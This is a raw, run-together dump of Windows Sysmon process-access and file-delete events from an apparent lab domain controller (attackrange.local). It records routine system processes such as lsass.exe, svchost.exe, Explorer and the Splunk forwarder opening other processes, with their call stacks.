08:05:46.944{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.944{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.944{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.944{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.923{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.923{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.923{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.923{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.923{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.923{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.907{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.907{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.891{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.891{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.891{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.891{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.776{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.776{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.560{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26AC1F71EBEBC89B9FEF9E1009C34F38,SHA256=55779F2F3D63FE6FD288472799E6FF11426EFBB41DBD9A952389D8E3ADCEF87E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.539{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C9824E85730C2E2E095A7BE163B58C5,SHA256=68CB141A92E38C3225E0FFF19E38C64276F5148E923A0485C84851861395A8A0,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001053981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.391{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001053980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.391{466BC892-32D3-60E8-700B-00000000CF01}16645372C:\Windows\System32\sihost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.391{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001053978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 